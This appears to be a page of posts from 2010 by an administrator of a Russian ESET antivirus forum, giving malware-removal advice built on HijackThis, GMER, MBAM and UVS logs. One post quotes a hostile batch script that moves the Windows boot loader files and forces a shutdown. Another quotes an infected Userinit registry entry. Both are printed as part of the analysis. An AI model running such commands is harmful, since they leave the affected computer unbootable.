Вход
Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи santy
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 1764 1765 1766 1767 1768 1769 1770 1771 1772 1773 1774 ... 1782 След.
Отправь смс на билайн, Помогите пожалуйста
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 15.07.2010 17:00:49
[QUOTE]Борис Кузьков пишет:
Возможно ли:
Так как у нас локальная сеть, включить тот компьютер, с рабочего просканить его на открытые порты, и что нибудь придумать.
[/QUOTE]
возможно, если использовать специализированную утилиту psexec.exe из набора Sysinternals Руссиновича.
[quote]
Usage: psexec [\\computer[,computer2[,...] | @file][-u user [-p psswd]][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
[/quote]
здесь ключи
-u Администратор (administrator]
-p пароль администратора.
[quote]
Если до вечера ничего не сможем сделать будем вызывать специалиста , он назвал цену 2 тысячи, много ли это для такой работы? (недалеко от г.Зеленоград)
[/quote]
Нормально. Вызов специалиста того стоит. :).
Перейти
Блокировка опасных сайтов ()
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 15.07.2010 14:45:44
какие настройки должны быть, чтобы всплывало данное сообщение, + если возможно, попадало в лог антивируса о срабатывании блокировки?
Перейти
Отправь смс на билайн, Помогите пожалуйста
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 15.07.2010 14:42:00
1. если есть возможность посмотреть процессы, скажем через Dameware, с машины администратора, подключитесь с его машины к вашей, чтобы увидеть и прибить вредоносные процессы;

2. с машины администратора подключите сетевой диск/мой компьютер - подключить сетевой диск - \\Ваш ИП\C$;
выполнить сканирование диска - это может быть долго и не факт, что сигнатуры вируса есть в базе антивируса;

3. скачайте с сайта разработчика UVS, отсюда http://dsrt.jino-net.ru/files/uvs_v312.zip
распакуйте в папку, запустите файл start.exe, создайте образ автозапуска, сохраните файл, зархивируйте, и добавьте на форум.
===
p.s. все, кто читает здесь - знают, что нельзя ходить по левым ссылкам.
Изменено: santy - 15.07.2010 14:43:04
Перейти
ESET блокирует адреса, Блокируются Адреса с разными ИП
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 13.07.2010 17:41:33
сделайте лог SysInspector-а, запостите на форум.

так же: скачайте с этой страницы http://www.gmer.net/#files файл антируткита. (EXE)
запустите, выполните быстрое сканирование (все сервисы, кроме жестких дисков)
лог gmer-а запостите на форум.

можно так же выполнить полное сканирование mbam. лог запостить на форум.
Перейти
[ Закрыто] Проблема с обновлением...
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 13.07.2010 17:31:23
хорошо.
[quote]O4 - HKLM\. .\Run: [zzzHPSETUP] D:\Setup.exe
[/quote]
пофикстить эту строку в hijackthis. (отметить данную строку и нажать Fix it)
выполнить в окне cmd команду
(пуск - выполнить - cmd)
route print >> c:\route.txt
файл c:\route.txt запостить на форум.

так же скачайте программу malwarebytes со страницы http://www.malwarebytes.org/mbam.php (free version)
установить, обновить базы (если возможно будет), выполнить быстрое сканирование,
лог запостить на форум.
Перейти
Запланированные задания (угроза)
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 13.07.2010 10:36:35
[quote]
grep — утилита командной строки, которая находит на вводе строки, отвечающие заданному регулярному выражению, и выводит их, если вывод не отменён специальным ключом. Название представляет собой акроним английской фразы «search globally for lines matching the regular expression, and print them» — «искать везде строки, соответствующие регулярному выражению, и выводить их».
[/quote]
смысл батника видимо в том, чтобы найти в настройках определенный ИП, пропинговать сайт rmh.ru, получить отткуда файл инструкций, протрассировать список команд, если найден STOP, то завершить выполнение в противном соучае управление идет на раздел [b]die[/b], что переводится как "угасать, умирать". Может, это просто любительский батник? с какой целью вам передан ноут от Ромира?
Перейти
[ Закрыто] Проблема с обновлением...
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 12.07.2010 17:50:13
Эти файлики c:\windows\system32\2c1xk4y.exe,c:\windows\system32\YguOrxk.exe собрать в в архив с паролем infected, отправить в почту по адресу [email protected], [email protected],
затем можно удалить из системы.
Перейти
[ Закрыто] Проблема с обновлением...
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 12.07.2010 17:43:47
Система заражена
[quote]
"Userinit" = "C:\WINDOWS\system32\userinit.exe,\\?\globalroot\systemroot\system32\2c1xk4y.exe,\\?\globalroot\systemroot\system32\YguOrxk.exe," ( 5: Unknown ) ; Cwecj Rmtryx ; Tezxw Svxuzr Rpwuyk ;
[/quote]
скачайте hijackthis из этой темы
http://forum.esetnod32.ru/forum9/topic53/
сделайте лог, запостите на форум.
Перейти
Запланированные задания (угроза)
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 11.07.2010 14:12:41
[quote]:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:\boot.ini c:\windows
move /y c:\ntdetect.com c:\windows
move /y c:\ntldr c:\windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end
[/quote]
Перемещение загрузчика ОС приведет к убийству системы. Зачем, спрашивается?
Перейти
мой нод32 постоянно пропускает на компьютер вирус trojan.pws.ibank
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 11.07.2010 13:20:35
[QUOTE]F1Driver пишет:
Добрый день! мой нод32 постоянно пропускает на компьютер вирус trojan.pws.ibank (по данным drweb cureit) в разных модификациях. Вирус блокирует сайты антивирусов и соответственно обновление нод32. Спасает вышеуказанная программа, в то время как нод32 спит.... Скажите, может у меня что-то не так настроено?[/QUOTE]

Добавьте сообщение в раздел обнаружение вредоносного кода и ложные срабатывания + логи зараженной машины, т.е. необходимо больше информации, кроме описания последствий.
Перейти
Пред. 1 ... 1764 1765 1766 1767 1768 1769 1770 1771 1772 1773 1774 ... 1782 След.